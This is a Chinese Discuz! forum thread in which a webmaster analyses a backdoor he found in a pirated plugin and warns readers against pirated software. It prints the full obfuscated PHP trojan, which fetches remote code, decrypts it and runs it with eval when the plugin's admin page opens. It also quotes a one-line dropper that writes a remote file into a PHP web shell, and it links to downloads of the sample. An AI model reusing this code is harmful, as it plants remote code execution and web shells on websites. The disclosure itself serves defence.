Discuz!应用商城(DisMall)Discuz!应用商城(DisMall)

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 293|回复: 10

【续集】魔趣吧的东西真的有后门木马,揭秘用盗版的危害

[复制链接]

2

主题

5

帖子

5

积分

Newbie

Rank: 1

贡献
0 点
金币
0 个
发表于 2020-6-30 20:23:56 | 显示全部楼层 |阅读模式
上次写了一篇文章 披露了盗版市场的乱象 ,没想到本人遭到魔趣吧的站长疯狂的报复。我自己的网站已经持续快10天魔趣吧的站长使用DDOS攻击技术,打不开了!因为在其网站进行了手机绑定,手机也整天被短信+电话轰炸!搞的我最近经常要开飞行模式!
但是我是绝对不会像黑恶势力低头的,大不了我网站不做了,手机号码不用了!

前文回顾:魔趣吧的东西好像真的有后门木马,改了我dz的后台密码
https://www.dismall.com/thread-5095-1-1.html

因为前面的那篇文章写的比较概况,没有列举证据(导致其大肆误导不明真相的群众说我在造谣),今天我就来列举一些证据,并对已知的后门进行深入详细的分析!
这可能是最后一篇曝光盗版市场乱象的文章了,因为我只是一个普普通通的站长!那些江湖经验丰富的站长我惹不起,我也见识了魔趣吧是如果把黑的说成白的!

他的理念就是只要对他有利的都是好文章,曝光他的都是在造谣他!

在正式进入主题之前,我想在说几句题外话:先不说他有没有干些见不得人的事,其损坏原创开发者权益,谋取自己的利益(俗称:盗版),还有什么资格在那一副正人君子的模样怼这个怼那个!

【下面才是今天要说的主题】
由于带后门的资源有点多,今天我就随便拿个在魔趣吧收费的资源,且我之前安装过,受害的资源来做分析!

样本下载链接:为了不给他打广告,帖子ID: 9183 ,知道他网站的随便打开一个帖子把id换成这个就可以定位到!

因为是VIP资源,所以我分享到了蓝奏网盘:https://wws.lanzous.com/iH9IQe6jymf  密码:c9mx

附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止因为我的曝光,他会修改附件,然后狡辩!对本文有异议的朋友可以在本文发布不久的时候,前去下载对比MD5值后,并效验是不是存在本文提到的后门木马!

样本插件名称:积分提现中心 V1.2

木马文件所在路径:keke_tixian\function\function_core.php


木马完整代码:
  1. <?php
  2. function zm_diconv($str){
  3.   $encode = mb_detect_encoding($str, array(

  4.         "ASCII",

  5.         "UTF-8",

  6.         "GB2312",

  7.         "GBK",

  8.         "BIG5"

  9.     ));

  10.     if ($encode != CHARSET) {

  11.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);

  12.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);

  13.     }

  14.     if (!$keytitle) {

  15.         $keytitle = $str;

  16.     }

  17.     return $keytitle;

  18. }
  19. function caidi($oo){
  20.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
  21.         $forver=stripos($love,'d');
  22.         $forvere=stripos($love,'z');
  23.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
  24.         $forveres='DECODE';
  25.         $aini=substr($love,$forver,$forvere);//获取方法函数名decrypt
  26.         $aini=$oo?$forveres:$aini;
  27.         return $aini;
  28. }
  29. function decrypt($data, $key = '721520') {
  30.                 global $_G;
  31.                 $key = $key ? $key : $_G['config']['security']['authkey'];
  32.                 $type = caidi($key);
  33.                 return authcode($data,$type, $key);
  34.                 }

  35. function contentz($svip) {
  36. if(function_exists('file_get_contents')) {
  37. $data = file_get_contents($svip);
  38. } else {
  39. $ch = curl_init();
  40. $timeout = 5;
  41. curl_setopt ($ch, CURLOPT_URL, $svip);
  42. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  43. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  44. $data = curl_exec($ch);
  45. curl_close($ch);
  46. }
  47. return $data;
  48. }
  49. $iloveyou = caidi($oo);
  50. eval($iloveyou(strip_tags(contentz($love))));
  51. ?>
复制代码
关键代码:
  1. $iloveyou = caidi($oo);
  2. eval($iloveyou(strip_tags(contentz($love))));
复制代码


有了这些信息 我们下面进行分析(在这里大胆的猜测一下:文件完全是魔趣吧自己加进去的,正版可能就没有这个文件,因为这个文件代码全是和后门有关!和插件自身功能没有关系)
在关键代码前面的都是木马伪装所需要用到的函数 执行过程如下:
1/----------------------

后门脚本执行入口:keke_tixian\admin.inc.php
关键代码在该文件第7行:引用后门文件并执行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解释:只要安装插件一打开后台的插件设置,木马就自动执行了!

2/--------依次执行----------


$iloveyou = caidi($oo);
解释:定义一个名为   iloveyou 的变量  ,值为: caidi($oo)
调试: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值等于:decrypt
备注:函数 caidi 定义并赋值了 $love  作全局变量, love 的值等于:htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次执行----------

eval($iloveyou(strip_tags(contentz($love))));

解释:已知 iloveyou 的值等于:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函数 contentz 得知该函数 是访问远程链接并返回内容,相当于 curl
分析函数 decrypt 得知该函数 是进行内容解密,直接调用了DISCUZ自带的解密函数 authcode


解释的解释:代码 eval($iloveyou(strip_tags(contentz($love)))); ,经过层层分析,最终为:
执行脚本 ( 解密 ( 访问远程代码 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次执行----------

htt去p://zonekey.w掉in/b中ai文duseo.xml 该链接现在访问返回的全部是 1111111111111111,所以无法继续分析远程的代码是什么!

可能魔趣吧站长已经知道我接下来会深入曝光他。所以暂时把远程代码先全部改成了 1111111111111111
即使是这样!又如何? 执行远程脚本 有什么危害?相信做网站的都知道!这里我不进行科普!感兴趣的站长可以百度自行科普:例:一句话木马,菜刀!
下面的代码是我网站自动多出来的一个文件:因为无法继续分析,直接看结果
  1. <?php
  2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));
复制代码
上面的xss.txt  防止 魔趣吧站长 再去取消 我上传到了 蓝奏网盘 https://wws.lanzous.com/iPkAWe6na9c 密码:i1nc

End/--------刨根问底--------

在前面一篇文章中提到过了  魔趣吧站长声称该木马是源码哥的!
但是既然干了,就干到底!
百度了一下 搜索 到 源码哥  ,在他网站搜索 了一下 积分提现中心  果然找到一个一模一样的版本!
花了20块钱下载下来(真黑啊,1.2  这么旧的版本还卖20),不过花20块钱 能让大家看清,防止中木马。也值得!

结局打脸: 没有 keke_tixian\function\function_core.php  这个文件,因为是边写边弄的,既然写好了就这样吧!
虽然没有发现木马,但是应该也是一丘之貉,还是呼吁大家不要用盗版!不要用盗版!不要用盗版!

PS:对魔趣吧站长传播木马,DDOS我的网站,短信+电话轰炸我的手机号 表示非常的鄙视!


希望官方管理员能够曝光这篇文章,让更多准备用盗版的站长、已经在用盗版的站长。赶紧回头是岸!
样本已经上传到蓝奏网盘,文章写的不到位的地方,欢迎各路大神补充!



回复

使用道具 举报

2

主题

5

帖子

5

积分

Newbie

Rank: 1

贡献
0 点
金币
0 个
 楼主| 发表于 2020-6-30 20:36:24 | 显示全部楼层
文中忘记说了!不能编辑 就占楼吧!
看图打脸
QQ图片20200630202743.png

1、保证无后门     
打脸:无后门!只是有木马
不如:保证无后门,绝对有木马!

2、魔趣吧修复后发布!
打脸:正版好好的东西,被魔趣吧修复一下就多了个后门木马?
不如:魔趣吧增加木马后发布

3、资源均经测试,请放心使用!
打脸:放个木马在你网站,你能放心?
不如:木马功能已经测试,请放心使用!零失误!


4、官方认证图标
打脸:魔趣吧官方正版木马,请放心中毒!


回复 支持 反对

使用道具 举报

2

主题

5

帖子

5

积分

Newbie

Rank: 1

贡献
0 点
金币
0 个
 楼主| 发表于 2020-6-30 20:39:11 | 显示全部楼层
申明:本文不是针对 可可 正版的应用  正版应用肯定是没有木马的!
本文说的是盗版的!


回复 支持 反对

使用道具 举报

2

主题

255

帖子

333

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
0 点
金币
69 个
发表于 2020-6-30 20:53:04 | 显示全部楼层
简单点说:无利不起早

开发者的利,自然是卖产品,也就是卖插件模板,为了多得利,自然要做好产品
站长的利,自然是通过程序赚钱或专区流量最终变现(也许你现在不赚钱,但别说永远不打算赚钱)
盗版站的利,要么是钱,要么是流量,但最终和站长是一样的,还是变现,如果打着所谓免费旗号,那么最终一定会在隐藏的地方来想办法赚钱,那么很明显,黑产是最简单的选择,那么后门木马就不稀奇了。

赚钱可以,但请通过自己的劳动正当获益,你要是自己写代码提供给站长,谁也没权利指责你,但开发者费时费力的劳动所得,你偷去倒卖,这就很不道德了,并且不止是不道德,这是违法的。

再加上黑产,那么就更加让人愤怒了,也就是说两头吃。

无利不起早,为利无可厚非,但请紧守底线,尊重别人的劳动。

经常有“站长”指责开发者卖的贵,不厚道。那么请你能写出一样的东西免费提供出来,但不能是偷别人的东西提供出来哦。当你能写出一样的东西的时候,并能始终免费提供,我向您投以真诚的敬意。

但别人通过大量的学习、探索、耗费精力和时间,劳动所得写出的内容,以此获取回报,则不能予以谴责。我们自然应当感恩免费的馈赠,但也同时应当尊重劳动回报的需求。
回复 支持 反对

使用道具 举报

4

主题

26

帖子

37

积分

Newbie

Rank: 1

贡献
0 点
金币
3 个
发表于 2020-6-30 23:22:00 来自手机版 | 显示全部楼层
以前贪便宜也是用盗版插件模版,安全中心三天两头的发出风险告警首页老是被改,删除了所有盗版插件模版,现在一直好好的
回复 支持 反对

使用道具 举报

0

主题

4

帖子

17

积分

Newbie

Rank: 1

贡献
0 点
金币
12 个
发表于 2020-6-30 23:46:45 | 显示全部楼层
魔趣我不知道 反正哪个源码哥的肯定是有木马。都自己修改内容
回复 支持 反对

使用道具 举报

1

主题

278

帖子

506

积分

Lord

Rank: 4

贡献
16 点
金币
128 个
发表于 7 天前 | 显示全部楼层
几百块一个月上高防就行。
回复 支持 反对

使用道具 举报

6

主题

132

帖子

254

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
0 点
金币
102 个
QQ
发表于 7 天前 | 显示全部楼层
罗永浩 发表于 2020-7-1 02:59
几百块一个月上高防就行。

能舍得几百块一个月高防用盗版,何不花百十块买个正版使用,不香吗?
回复 支持 反对

使用道具 举报

11

主题

69

帖子

92

积分

Member

Rank: 2Rank: 2

贡献
0 点
金币
19 个
QQ
发表于 7 天前 | 显示全部楼层
嗯,当我看见你那个帖子的时候,发现一个叫做魔趣吧的用户回复了你但被discuz管理员屏蔽了我就知道事情不简单。我不站楼主和魔趣吧,我站discuz管理员的做法(放肆的大笑)
初锦官网七站点:www.chujin.us
回复 支持 反对

使用道具 举报

5

主题

19

帖子

48

积分

开发者

Rank: 6Rank: 6Rank: 6

贡献
0 点
金币
28 个
发表于 7 天前 | 显示全部楼层
这故事引起了我的注意
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz!应用中心 ( 皖ICP备16010102号 ) star

GMT+8, 2020-7-8 06:10

Powered by Discuz!

© 2001-2019 Tencent Cloud.

快速回复 返回顶部 返回列表